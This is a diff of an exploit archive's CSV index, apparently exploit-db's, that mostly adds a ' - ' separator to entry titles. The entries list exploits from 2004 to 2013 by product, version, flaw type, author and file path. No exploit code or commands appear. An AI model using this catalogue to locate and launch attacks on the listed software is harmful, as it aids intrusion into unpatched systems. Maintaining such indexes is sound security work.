GET Denial of Service Vulnerability (1)",2004-05-25,badpack3t,windows,dos,0 24146,platforms/windows/dos/24146.bat,"Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial of Service Vulnerability (2)",2004-06-02,CoolICE,windows,dos,0 @@ -21357,7 +21357,7 @@ id,file,description,date,author,platform,type,port 24195,platforms/windows/dos/24195.pl,"WinAgents TFTP Server 3.0 - Remote Buffer Overrun Vulnerability",2004-06-11,"Ziv Kamir",windows,dos,0 24196,platforms/windows/remote/24196.txt,"Mozilla Browser 1.6/1.7 URI Obfuscation Weakness",2004-06-14,http-equiv,windows,remote,0 24197,platforms/cgi/webapps/24197.txt,"Linksys Web Camera Software 2.10 Next_file Parameter Cross-Site Scripting Vulnerability",2004-06-14,scriptX,cgi,webapps,0 -24198,platforms/asp/webapps/24198.txt,"Virtual Programming VP-ASP Shoperror Script 4/5 Cross-Site Scripting Vulnerability",2004-06-14,"Thomas Ryan",asp,webapps,0 +24198,platforms/asp/webapps/24198.txt,"Virtual Programming VP-ASP Shoperror Script 4/5 - Cross-Site Scripting Vulnerability",2004-06-14,"Thomas Ryan",asp,webapps,0 24199,platforms/php/webapps/24199.txt,"Invision Power Board 1.3 SSI.PHP Cross-Site Scripting Vulnerability",2004-06-14,"IMAN Sharafoddin",php,webapps,0 24200,platforms/windows/local/24200.txt,"Sygate Personal Firewall Pro 5.5 - Local Fail-Close Bypass Vulnerability",2004-06-14,"Tan Chew Keong",windows,local,0 24201,platforms/php/webapps/24201.txt,"php-Charts Arbitrary PHP Code Execution Vulnerability",2013-01-18,AkaStep,php,webapps,0 @@ -21390,7 +21390,7 @@ id,file,description,date,author,platform,type,port 24228,platforms/php/webapps/24228.txt,"Joomla com_collector Component Arbitrary File Upload Vulnerability",2013-01-19,"Red Dragon_al",php,webapps,0 24229,platforms/php/webapps/24229.txt,"Wordpress plugin Ripe HD FLV Player SQL Injection Vulnerability",2013-01-19,Zikou-16,php,webapps,0 24230,platforms/hardware/remote/24230.txt,"BT Voyager 2000 Wireless ADSL Router SNMP Community String Information Disclosure Vulnerability",2004-06-22,"Konstantin V. Gavrilenko",hardware,remote,0 -24231,platforms/php/webapps/24231.txt,"ArbitroWeb PHP Proxy 0.5/0.6 Cross-Site Scripting Vulnerability",2004-06-22,"Josh Gilmour",php,webapps,0 +24231,platforms/php/webapps/24231.txt,"ArbitroWeb PHP Proxy 0.5/0.6 - Cross-Site Scripting Vulnerability",2004-06-22,"Josh Gilmour",php,webapps,0 24232,platforms/php/webapps/24232.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - Multiple Vulnerabilities",2004-06-23,"Janek Vind",php,webapps,0 24233,platforms/freebsd/dos/24233.c,"FreeBSD 4.10/5.x - execve() Unaligned Memory Access Denial of Service Vulnerability",2004-06-23,"Marceta Milos",freebsd,dos,0 24234,platforms/php/webapps/24234.html,"VBulletin 3.0.1 newreply.php WYSIWYG_HTML Parameter XSS",2004-06-24,"Cheng Peng Su",php,webapps,0 @@ -21405,14 +21405,14 @@ id,file,description,date,author,platform,type,port 24243,platforms/unix/dos/24243.txt,"IBM Lotus Domino Server 6 - Web Access Remote Denial of Service Vulnerability",2004-06-30,"Andreas Klein",unix,dos,0 24244,platforms/cgi/webapps/24244.txt,"Netegrity IdentityMinder Web Edition 5.6 Null Byte XSS",2004-07-01,vuln@hexview.com,cgi,webapps,0 24245,platforms/cgi/webapps/24245.txt,"Netegrity IdentityMinder Web Edition 5.6 Management Interface XSS",2004-07-01,vuln@hexview.com,cgi,webapps,0 -24246,platforms/multiple/remote/24246.txt,"SCI Photo Chat 3.4.9 Cross-Site Scripting Vulnerability",2004-07-20,"Donato Ferrante",multiple,remote,0 +24246,platforms/multiple/remote/24246.txt,"SCI Photo Chat 3.4.9 - Cross-Site Scripting Vulnerability",2004-07-20,"Donato Ferrante",multiple,remote,0 24247,platforms/multiple/dos/24247.txt,"Easy Chat Server 1.x - Multiple Denial of Service Vulnerabilities",2004-07-02,"Donato Ferrante",multiple,dos,0 -24248,platforms/unix/dos/24248.txt,"IBM WebSphere Caching Proxy Server 5.0 2 Denial of Service Vulnerability",2004-07-02,"Leandro Meiners",unix,dos,0 +24248,platforms/unix/dos/24248.txt,"IBM WebSphere Caching Proxy Server 5.0 2 - Denial of Service Vulnerability",2004-07-02,"Leandro Meiners",unix,dos,0 24249,platforms/windows/remote/24249.html,"Microsoft Internet Explorer 6.0 Shell.Application Object Script Execution Weakness",2004-07-03,http-equiv,windows,remote,0 24250,platforms/multiple/remote/24250.pl,"MySQL 4.1/5.0 Authentication Bypass Vulnerability",2004-07-05,"Eli Kara",multiple,remote,0 24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-spam 6.0 Unauthorized Message Disclosure Vulnerability",2004-07-05,"Thomas Springer",cgi,webapps,0 24252,platforms/cgi/webapps/24252.txt,"fastream netfile ftp/web server 6.5/6.7 - Directory Traversal Vulnerability",2004-07-05,"Andres Tarasco Acuna",cgi,webapps,0 -24253,platforms/multiple/remote/24253.txt,"12Planet Chat Server 2.9 Cross-Site Scripting Vulnerability",2004-07-05,"Donato Ferrante",multiple,remote,0 +24253,platforms/multiple/remote/24253.txt,"12Planet Chat Server 2.9 - Cross-Site Scripting Vulnerability",2004-07-05,"Donato Ferrante",multiple,remote,0 24254,platforms/cgi/webapps/24254.txt,"BasiliX Webmail 1.1 Email Header HTML Injection Vulnerability",2004-07-05,"Roman Medina-Heigl Hernandez",cgi,webapps,0 24255,platforms/php/webapps/24255.txt,"JAWS 0.2/0.3 index.php gadget Parameter Traversal Arbitrary File Access",2004-07-06,"Fernando Quintero",php,webapps,0 24256,platforms/php/webapps/24256.php,"JAWS 0.2/0.3 Cookie Manipulation Authentication Bypass",2004-07-06,"Fernando Quintero",php,webapps,0 @@ -21444,7 +21444,7 @@ id,file,description,date,author,platform,type,port 24283,platforms/multiple/dos/24283.txt,"Gattaca Server 2003 POP3 DoS",2004-07-15,dr_insane,multiple,dos,0 24284,platforms/cgi/webapps/24284.txt,"Gattaca Server 2003 Null Byte Path Disclosure",2004-07-15,dr_insane,cgi,webapps,0 24285,platforms/cgi/webapps/24285.txt,"Gattaca Server 2003 Language Variable Path Exposure",2004-07-15,dr_insane,cgi,webapps,0 -24286,platforms/cgi/webapps/24286.txt,"Gattaca Server 2003 Cross-Site Scripting Vulnerability",2004-07-15,dr_insane,cgi,webapps,0 +24286,platforms/cgi/webapps/24286.txt,"Gattaca Server 2003 - Cross-Site Scripting Vulnerability",2004-07-15,dr_insane,cgi,webapps,0 24287,platforms/cgi/webapps/24287.txt,"BoardPower Forum ICQ.CGI Cross-Site Scripting Vulnerability",2004-07-15,"Alexander Antipov",cgi,webapps,0 24288,platforms/windows/dos/24288.txt,"Symantec Norton Antivirus 2001/2002/2003/2004 Script Blocker Denial of Service Vulnerability",2004-07-16,vozzie,windows,dos,0 24289,platforms/php/webapps/24289.c,"Artmedic Webdesign Kleinanzeigen Script File Include Vulnerability",2004-07-19,"Adam Simuntis",php,webapps,0 @@ -21481,7 +21481,7 @@ id,file,description,date,author,platform,type,port 24320,platforms/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection Vulnerability",2013-01-24,RealGame,multiple,webapps,0 24321,platforms/multiple/remote/24321.rb,"Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution",2013-01-07,metasploit,multiple,remote,0 24322,platforms/multiple/remote/24322.rb,"SonicWALL Gms 6 Arbitrary File Upload",2013-01-24,metasploit,multiple,remote,0 -24323,platforms/multiple/remote/24323.rb,"Novell eDirectory 8 Buffer Overflow",2013-01-24,metasploit,multiple,remote,0 +24323,platforms/multiple/remote/24323.rb,"Novell eDirectory 8 - Buffer Overflow",2013-01-24,metasploit,multiple,remote,0 24324,platforms/php/webapps/24324.txt,"PostNuke 0.72/0.75 Reviews Module Cross-Site Scripting Vulnerability",2004-07-26,DarkBicho,php,webapps,0 24325,platforms/multiple/remote/24325.html,"Opera Web Browser 7.53 Location Replace URI Obfuscation Weakness",2004-07-27,"bitlance winter",multiple,remote,0 24326,platforms/cgi/remote/24326.txt,"RiSearch 0.99 /RiSearch Pro 3.2.6 show.pl Open Proxy Relay",2004-07-27,"Phil Robinson",cgi,remote,0 @@ -21613,7 +21613,7 @@ id,file,description,date,author,platform,type,port 24460,platforms/windows/remote/24460.rb,"VMWare OVF Tools Format String Vulnerability",2013-02-06,metasploit,windows,remote,0 24461,platforms/windows/remote/24461.rb,"VMWare OVF Tools Format String Vulnerability",2013-02-12,metasploit,windows,remote,0 24462,platforms/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,php,webapps,0 -24463,platforms/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos,0 +24463,platforms/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 - Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos,0 24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0 24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 (cubecart.class.php) PHP Object Injection Vulnerability",2013-02-07,EgiX,php,webapps,0 24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0 @@ -21702,7 +21702,7 @@ id,file,description,date,author,platform,type,port 24570,platforms/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 Path Environment Variable Local Command Execution Vulnerability",2004-09-03,"Julio Cesar Fort",linux,local,0 24571,platforms/windows/remote/24571.html,"Nullsoft Winamp 2.x/3.x/5.0.x ActiveX Control Remote Buffer Overflow Vulnerability",2004-09-03,celebrityhacker,windows,remote,0 24572,platforms/windows/remote/24572.pl,"Ipswitch WhatsUp Gold 7.0/8.0 Notification Instance Name Remote Buffer Overflow Vulnerability",2004-09-03,anonymous,windows,remote,0 -24573,platforms/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 Cross-Site Scripting Vulnerabilities",2004-09-04,dr_insane,multiple,webapps,0 +24573,platforms/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 - Cross-Site Scripting Vulnerabilities",2004-09-04,dr_insane,multiple,webapps,0 24574,platforms/cgi/webapps/24574.txt,"Webmin 1.x HTML Email Command Execution Vulnerability",2004-09-07,"Keigo Yamazaki",cgi,webapps,0 24575,platforms/php/webapps/24575.txt,"PSNews 1.1 No Parameter Cross-Site Scripting Vulnerability",2004-09-05,"Michal Blaszczak",php,webapps,0 24576,platforms/cgi/webapps/24576.txt,"UtilMind Solutions Site News 1.1 Authentication Bypass Vulnerability",2004-09-07,anonymous,cgi,webapps,0 @@ -21888,13 +21888,13 @@ id,file,description,date,author,platform,type,port 24762,platforms/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,php,webapps,0 24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plug-in JavaScript Security Restriction Bypass Vulnerability",2004-11-22,"Jouko Pynnonen",multiple,dos,0 24766,platforms/php/webapps/24766.txt,"NuKed-Klan 1.x Submit Link Function HTML Injection Vulnerability",2004-11-23,XioNoX,php,webapps,0 -24767,platforms/windows/remote/24767.txt,"Raven Software Soldier Of Fortune 2 Buffer Overflow Vulnerability",2004-11-23,"Luigi Auriemma",windows,remote,0 +24767,platforms/windows/remote/24767.txt,"Raven Software Soldier Of Fortune 2 - Buffer Overflow Vulnerability",2004-11-23,"Luigi Auriemma",windows,remote,0 24768,platforms/php/webapps/24768.txt,"SugarCRM 1.x/2.0 Module record Parameter SQL Injection",2004-11-23,"James Bercegay",php,webapps,0 24769,platforms/php/webapps/24769.txt,"SugarCRM 1.x/2.0 Module Traversal Arbitrary File Access",2004-11-23,"James Bercegay",php,webapps,0 24770,platforms/windows/dos/24770.py,"Jabber Server 2.0 - Multiple Remote Buffer Overflow Vulnerabilities",2004-11-24,icbm,windows,dos,0 24771,platforms/php/webapps/24771.txt,"KorWeblog 1.6.2 - Remote Directory Listing Vulnerability",2004-11-24,"Jeremy Bae",php,webapps,0 -24772,platforms/php/webapps/24772.txt,"Zwiki 0.10/0.36.2 Cross-Site Scripting Vulnerability",2004-11-24,"Jeremy Bae",php,webapps,0 -24773,platforms/jsp/webapps/24773.txt,"JSPWiki 2.1 Cross-Site Scripting Vulnerability",2004-11-24,"Jeremy Bae",jsp,webapps,0 +24772,platforms/php/webapps/24772.txt,"Zwiki 0.10/0.36.2 - Cross-Site Scripting Vulnerability",2004-11-24,"Jeremy Bae",php,webapps,0 +24773,platforms/jsp/webapps/24773.txt,"JSPWiki 2.1 - Cross-Site Scripting Vulnerability",2004-11-24,"Jeremy Bae",jsp,webapps,0 24774,platforms/multiple/remote/24774.java,"Open DC Hub 0.7.14 - Remote Buffer Overflow Vulnerability",2004-11-24,"Donato Ferrante",multiple,remote,0 24775,platforms/windows/dos/24775.html,"Microsoft Internet Explorer 6.0 Infinite Array Sort Denial of Service Vulnerability",2004-11-25,"Berend-Jan Wever",windows,dos,0 24776,platforms/windows/dos/24776.html,"Mozilla Firefox 0.8/0.9/0.10 Infinite Array Sort Denial of Service Vulnerability",2004-11-25,"Berend-Jan Wever",windows,dos,0 @@ -21903,7 +21903,7 @@ id,file,description,date,author,platform,type,port 24779,platforms/cgi/webapps/24779.txt,"InShop and InMail Cross-Site Scripting Vulnerabilities",2004-11-25,"Carlos Ulver",cgi,webapps,0 24780,platforms/osx/dos/24780.html,"Apple Safari Web Browser 1.x Infinite Array Sort Denial of Service Vulnerability",2004-11-25,"Berend-Jan Wever",osx,dos,0 24781,platforms/multiple/dos/24781.html,"Mozilla Camino Web Browser 0.7/0.8 Infinite Array Sort Denial of Service Vulnerability",2004-11-25,"Berend-Jan Wever",multiple,dos,0 -24782,platforms/php/webapps/24782.txt,"PHPCMS 1.1/1.2 Cross-Site Scripting Vulnerability",2004-11-26,"Cyrille Barthelemy",php,webapps,0 +24782,platforms/php/webapps/24782.txt,"PHPCMS 1.1/1.2 - Cross-Site Scripting Vulnerability",2004-11-26,"Cyrille Barthelemy",php,webapps,0 24783,platforms/php/webapps/24783.txt,"pntresmailer 6.0 - Directory Traversal Vulnerability",2004-11-26,"John Cobb",php,webapps,0 24784,platforms/linux/remote/24784.txt,"File ELF 4.x Header Unspecified Buffer Overflow Vulnerability",2004-11-29,anonymous,linux,remote,0 24786,platforms/jsp/webapps/24786.txt,"Cisco Video Surveillance Operations Manager 6.3.2 - Multiple vulnerabilities",2013-03-15,Bassem,jsp,webapps,0 @@ -21916,7 +21916,7 @@ id,file,description,date,author,platform,type,port 24794,platforms/linux/remote/24794.sh,"SCPOnly 2.x/3.x - Remote Arbitrary Command Execution Vulnerability",2004-12-02,"Jason Wies",linux,remote,0 24795,platforms/linux/remote/24795.txt,"RSSH 2.x - Remote Arbitrary Command Execution Vulnerability",2004-12-02,"Jason Wies",linux,remote,0 24796,platforms/php/webapps/24796.txt,"Blog Torrent 0.8 - Remote Directory Traversal Vulnerability",2004-12-02,"Steve Kemp",php,webapps,0 -24797,platforms/php/webapps/24797.txt,"Advanced Guestbook 2.2/2.3 Cross-Site Scripting Vulnerability",2004-12-02,"Emile van Elen",php,webapps,0 +24797,platforms/php/webapps/24797.txt,"Advanced Guestbook 2.2/2.3 - Cross-Site Scripting Vulnerability",2004-12-02,"Emile van Elen",php,webapps,0 24798,platforms/php/webapps/24798.txt,"PAFileDB 3.1 Error Message Path Disclosure Vulnerability",2004-12-04,y3dips,php,webapps,0 24799,platforms/multiple/dos/24799.txt,"Mozilla0.x,Netscape 3/4,Firefox 1.0 JavaScript IFRAME Rendering Denial Of Servic",2004-12-06,"Niek van der Maas",multiple,dos,0 24800,platforms/windows/remote/24800.txt,"Microsoft Internet Explorer 5.0.1 FTP URI Arbitrary FTP Server Command Execution Vulnerability",2004-12-06,"Albert Puigsech Galicia",windows,remote,0 @@ -22212,7 +22212,7 @@ id,file,description,date,author,platform,type,port 25108,platforms/cgi/webapps/25108.txt,"AWStats 5.x/6.x Logfile Parameter Remote Command Execution Vulnerability",2005-02-16,newbug@chroot.org,cgi,webapps,0 25109,platforms/php/webapps/25109.txt,"DCP-Portal 6.1.1 - Multiple SQL Injection Vulnerabilities",2005-02-16,Exoduks,php,webapps,0 25110,platforms/asp/webapps/25110.txt,"Microsoft ASP.NET 1.0/1.1 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-16,"Andrey Rusyaev",asp,webapps,0 -25111,platforms/php/webapps/25111.txt,"PaNews 2.0 Cross-Site Scripting Vulnerability",2005-02-16,pi3ch,php,webapps,0 +25111,platforms/php/webapps/25111.txt,"PaNews 2.0 - Cross-Site Scripting Vulnerability",2005-02-16,pi3ch,php,webapps,0 25112,platforms/php/webapps/25112.txt,"MercuryBoard Forum 1.0/1.1 - Remote Cross-Site Scripting Vulnerability",2005-02-16,Lostmon,php,webapps,0 25113,platforms/php/webapps/25113.txt,"WebCalendar 0.9.45 SQL Injection Vulnerability",2005-02-17,"Michael Scovetta",php,webapps,0 25114,platforms/php/webapps/25114.txt,"paFaq beta4 question.php Multiple Parameter SQL Injection",2005-02-17,pi3ch,php,webapps,0 @@ -22286,7 +22286,7 @@ id,file,description,date,author,platform,type,port 25182,platforms/php/webapps/25182.txt,"auraCMS 1.5 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-02,"echo staff",php,webapps,0 25183,platforms/php/webapps/25183.txt,"ProjectBB 0.4.5.1 - Multiple Remote Cross-Site Scripting Vulnerabilities",2005-03-02,"benji lemien",php,webapps,0 25184,platforms/php/webapps/25184.txt,"ProjectBB 0.4.5.1 - Multiple SQL Injection Vulnerabilities",2005-03-02,"benji lemien",php,webapps,0 -25185,platforms/php/webapps/25185.txt,"D-Forum 1.11 Nav.PHP3 Cross-Site Scripting Vulnerability",2005-03-03,benjilenoob,php,webapps,0 +25185,platforms/php/webapps/25185.txt,"D-Forum 1.11 Nav.PHP3 - Cross-Site Scripting Vulnerability",2005-03-03,benjilenoob,php,webapps,0 25186,platforms/php/webapps/25186.txt,"Typo3 CMW_Linklist 1.4.1 Extension SQL Injection Vulnerability",2005-03-03,"Fabian Becker",php,webapps,0 25187,platforms/windows/remote/25187.txt,"Computalynx CProxy 3.3/3.4.x - Directory Traversal Vulnerability",2005-03-03,"Kristof Philipsen",windows,remote,0 25188,platforms/windows/remote/25188.txt,"Opera 7.x, Firefox 1.0, Internet Explorer 6.0 Information Disclosure Weakness",2005-02-19,upken,windows,remote,0 @@ -22380,7 +22380,7 @@ id,file,description,date,author,platform,type,port 25277,platforms/hardware/dos/25277.txt,"Netcomm NB1300 Modem/Router Remote Denial of Service Vulnerability",2005-03-25,"Chris Rock",hardware,dos,0 25278,platforms/php/webapps/25278.sh,"ESMI PayPal Storefront 1.7 pages.php idpages Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 25279,platforms/php/webapps/25279.txt,"ESMI PayPal Storefront 1.7 products1.php id2 Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 -25280,platforms/php/webapps/25280.txt,"ESMI PayPal Storefront 1.7 Cross-Site Scripting Vulnerability",2005-03-26,Dcrab,php,webapps,0 +25280,platforms/php/webapps/25280.txt,"ESMI PayPal Storefront 1.7 - Cross-Site Scripting Vulnerability",2005-03-26,Dcrab,php,webapps,0 25281,platforms/windows/dos/25281.py,"Apple QuickTime 6.5.1 PictureViewer Buffer Overflow Vulnerability",2005-03-26,liquid@cyberspace.org,windows,dos,0 25282,platforms/php/webapps/25282.txt,"Nuke Bookmarks 0.6 Marks.php Path Disclosure Vulnerability",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 25283,platforms/php/webapps/25283.txt,"Nuke Bookmarks 0.6 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 @@ -22426,7 +22426,7 @@ id,file,description,date,author,platform,type,port 25326,platforms/windows/dos/25326.txt,"RUMBA 7.3/7.4 Profile Handling Multiple Buffer Overflow Vulnerabilities",2005-04-01,"Bahaa Naamneh",windows,dos,0 25327,platforms/php/webapps/25327.txt,"AlstraSoft EPay Pro 2.0 - Remote File Include Vulnerability",2005-04-01,Dcrab,php,webapps,0 25328,platforms/php/webapps/25328.txt,"AlstraSoft EPay Pro 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-04-01,Dcrab,php,webapps,0 -25329,platforms/windows/dos/25329.cfg,"Star Wars Jedi Knight: Jedi Academy 1.0.11 Buffer Overflow Vulnerability",2005-04-02,"Luigi Auriemma",windows,dos,0 +25329,platforms/windows/dos/25329.cfg,"Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow Vulnerability",2005-04-02,"Luigi Auriemma",windows,dos,0 25330,platforms/php/webapps/25330.txt,"PHPMyAdmin 2.x Convcharset Cross-Site Scripting Vulnerability",2005-04-03,"Oriol Torrent Santiago",php,webapps,0 25331,platforms/cgi/webapps/25331.txt,"SonicWALL SOHO 5.1.7 Web Interface Multiple Remote Input Validation Vulnerabilities",2005-04-04,"Oliver Karow",cgi,webapps,0 25332,platforms/asp/webapps/25332.txt,"SiteEnable SQL Injection Vulnerability",2005-04-02,Zinho,asp,webapps,0 @@ -22684,7 +22684,7 @@ id,file,description,date,author,platform,type,port 25589,platforms/asp/webapps/25589.txt,"MaxWebPortal 1.3 custom_link.asp Multiple Parameter SQL Injection",2005-05-02,s-dalili,asp,webapps,0 25590,platforms/php/webapps/25590.txt,"OSTicket 1.2/1.3 - Multiple Input Validation and Remote Code Injection Vulnerabilities",2005-05-03,"James Bercegay",php,webapps,0 25591,platforms/php/webapps/25591.txt,"SitePanel2 2.6.1 - Multiple Input Validation Vulnerabilities",2005-05-03,"James Bercegay",php,webapps,0 -25592,platforms/cgi/webapps/25592.txt,"WebCrossing WebX 5.0 Cross-Site Scripting Vulnerability",2005-05-03,dr_insane,cgi,webapps,0 +25592,platforms/cgi/webapps/25592.txt,"WebCrossing WebX 5.0 - Cross-Site Scripting Vulnerability",2005-05-03,dr_insane,cgi,webapps,0 25593,platforms/php/webapps/25593.txt,"Invision Power Board 2.0.3/2.1 Act Parameter Cross-Site Scripting Vulnerability",2005-05-03,"arron ward",php,webapps,0 25594,platforms/cgi/webapps/25594.txt,"Gossamer Threads Links 2.x User.CGI Cross-Site Scripting Vulnerability",2005-05-04,"Nathan House",cgi,webapps,0 25595,platforms/asp/webapps/25595.txt,"ASP Inline Corporate Calendar 3.6.3 Defer.ASP SQL Injection Vulnerability",2005-05-04,Zinho,asp,webapps,0 @@ -22702,7 +22702,7 @@ id,file,description,date,author,platform,type,port 25607,platforms/windows/local/25607.py,"Ophcrack 3.5.0 - Local Code Execution BOF",2013-05-21,xis_one,windows,local,0 25608,platforms/hardware/remote/25608.rb,"Linksys WRT160nv2 - apply.cgi Remote Command Injection",2013-05-21,metasploit,hardware,remote,80 25609,platforms/hardware/remote/25609.rb,"D-Link DIR615h OS Command Injection",2013-05-21,metasploit,hardware,remote,80 -25611,platforms/windows/dos/25611.txt,"win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase",2013-05-21,"Tavis Ormandy",windows,dos,0 +25611,platforms/windows/dos/25611.txt,"Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase",2013-05-21,"Tavis Ormandy",windows,dos,0 25612,platforms/php/webapps/25612.txt,"myBloggie 2.1 index.php year Parameter XSS",2005-05-05,"Alberto Trivero",php,webapps,0 25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g Database Fine Grained Audit Logging Failure Vulnerability",2005-05-05,"Alexander Kornbrust",multiple,remote,0 25614,platforms/php/webapps/25614.txt,"MidiCart PHP Search_List.PHP SearchString Parameter SQL Injection Vulnerability",2005-05-05,Exoduks,php,webapps,0 @@ -22737,7 +22737,7 @@ id,file,description,date,author,platform,type,port 25643,platforms/windows/remote/25643.txt,"GeoVision Digital Surveillance System 6.0 4/6.1 Unauthorized JPEG Image Access Vulnerability",2005-05-10,"Tirath Rai",windows,remote,0 25644,platforms/php/webapps/25644.txt,"e107 Website System 0.617 Request.PHP Directory Traversal Vulnerability",2005-05-10,Heintz,php,webapps,0 25645,platforms/php/webapps/25645.txt,"e107 Website System 0.617 Forum_viewforum.PHP SQL Injection Vulnerability",2005-05-10,Heintz,php,webapps,0 -25646,platforms/windows/remote/25646.txt,"MyServer 0.8 Cross-Site Scripting Vulnerability",2005-05-10,dr_insane,windows,remote,0 +25646,platforms/windows/remote/25646.txt,"MyServer 0.8 - Cross-Site Scripting Vulnerability",2005-05-10,dr_insane,windows,remote,0 25647,platforms/linux/local/25647.sh,"Linux Kernel 2.2.x / 2.3.x / 2.4.x / 2.5.x / 2.6.x - ELF Core Dump Local Buffer Overflow Vulnerability",2005-05-11,"Paul Starzetz",linux,local,0 25648,platforms/cgi/remote/25648.txt,"neteyes nexusway border gateway Multiple Vulnerabilities",2005-05-11,pokley,cgi,remote,0 25649,platforms/cgi/webapps/25649.txt,"showoff! digital media software 1.5.4 - Multiple Vulnerabilities",2011-05-11,dr_insane,cgi,webapps,0 @@ -22750,8 +22750,8 @@ id,file,description,date,author,platform,type,port 25656,platforms/php/webapps/25656.txt,"OpenBB 1.0.8 Read.PHP SQL Injection Vulnerability",2005-05-13,Megasky,php,webapps,0 25657,platforms/php/webapps/25657.txt,"OpenBB 1.0.8 Member.PHP Cross-Site Scripting Vulnerability",2005-05-13,Megasky,php,webapps,0 25658,platforms/windows/dos/25658.txt,"Yahoo! Messenger 5.x/6.0 URL Handler Remote Denial of Service Vulnerability",2005-05-13,"Torseq Tech",windows,dos,0 -25659,platforms/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 Start-Page.CSS.PHP3 Cross-Site Scripting Vulnerability",2005-05-13,Megasky,php,webapps,0 -25660,platforms/php/webapps/25660.txt,"PHPHeaven PHPMyChat 0.14.5 Style.CSS.PHP3 Cross-Site Scripting Vulnerability",2005-05-13,Megasky,php,webapps,0 +25659,platforms/php/webapps/25659.txt,"PHPHeaven PHPMyChat 0.14.5 Start-Page.CSS.PHP3 - Cross-Site Scripting Vulnerability",2005-05-13,Megasky,php,webapps,0 +25660,platforms/php/webapps/25660.txt,"PHPHeaven PHPMyChat 0.14.5 Style.CSS.PHP3 - Cross-Site Scripting Vulnerability",2005-05-13,Megasky,php,webapps,0 25661,platforms/asp/webapps/25661.txt,"Keyvan1 ImageGallery Database Download Vulnerability",2005-05-01,"g0rellazz G0r",asp,webapps,0 25662,platforms/php/webapps/25662.txt,"Skull-Splitter Guestbook 1.0/2.0/2.2 - Multiple HTML Injection Vulnerabilities",2005-05-14,"Morinex Eneco",php,webapps,0 25663,platforms/php/webapps/25663.txt,"Shop-Script CategoryID SQL Injection Vulnerability",2005-05-16,"CENSORED Search Vulnerabilities",php,webapps,0 @@ -22829,7 +22829,7 @@ id,file,description,date,author,platform,type,port 25737,platforms/windows/dos/25737.txt,"Microsoft Windows 98SE User32.DLL Icon Handling Denial of Service Vulnerability",2005-05-26,klistas,windows,dos,0 25738,platforms/jsp/webapps/25738.txt,"BEA WebLogic 7.0/8.1 Administration Console LoginForm.jsp Cross-Site Scripting Vulnerability",2005-05-27,"Team SHATTER",jsp,webapps,0 25739,platforms/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 Administration Console Error Page Cross-Site Scripting Vulnerability",2005-05-27,"Team SHATTER",jsp,webapps,0 -25740,platforms/php/webapps/25740.txt,"JAWS Glossary 0.4/0.5 Cross-Site Scripting Vulnerability",2005-05-27,Nah,php,webapps,0 +25740,platforms/php/webapps/25740.txt,"JAWS Glossary 0.4/0.5 - Cross-Site Scripting Vulnerability",2005-05-27,Nah,php,webapps,0 25741,platforms/php/webapps/25741.bat,"Invision Power Board 1.x Unauthorized Access Vulnerability",2005-05-28,V[i]RuS,php,webapps,0 25742,platforms/php/webapps/25742.txt,"NPDS 4.8 /5.0 admin.php language Parameter XSS",2005-05-28,NoSP,php,webapps,0 25743,platforms/php/webapps/25743.txt,"NPDS 4.8 /5.0 powerpack_f.php language Parameter XSS",2005-05-28,NoSP,php,webapps,0 @@ -22922,7 +22922,7 @@ id,file,description,date,author,platform,type,port 25831,platforms/php/webapps/25831.txt,"ATutor 1.4.3 inbox/index.php view Parameter XSS",2005-06-16,Lostmon,php,webapps,0 25832,platforms/php/webapps/25832.txt,"ATutor 1.4.3 tile.php Multiple Parameter XSS",2005-06-16,Lostmon,php,webapps,0 25833,platforms/php/webapps/25833.txt,"ATutor 1.4.3 subscribe_forum.php us Parameter XSS",2005-06-16,Lostmon,php,webapps,0 -25834,platforms/php/webapps/25834.txt,"ATutor 1.4.3 directory.php Multiple Parameter XSS",2005-06-16,Lostmon,php,webapps,0 +25834,platforms/php/webapps/25834.txt,"ATutor 1.4.3 - directory.php Multiple Parameter XSS",2005-06-16,Lostmon,php,webapps,0 25835,platforms/windows/remote/25835.html,"Logic Print 2013 - Stack Overflow (vTable Overwrite)",2013-05-30,h1ch4m,windows,remote,0 25836,platforms/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - SEH Based Remote Code Execution",2013-05-30,xis_one,windows,remote,0 25837,platforms/linux/dos/25837.txt,"Monkey HTTPD 1.1.1 - Crash PoC",2013-05-30,"Doug Prostko",linux,dos,0 @@ -23153,7 +23153,7 @@ id,file,description,date,author,platform,type,port 26068,platforms/php/webapps/26068.txt,"Web Content Management List.php strTable Parameter XSS",2005-08-03,rgod,php,webapps,0 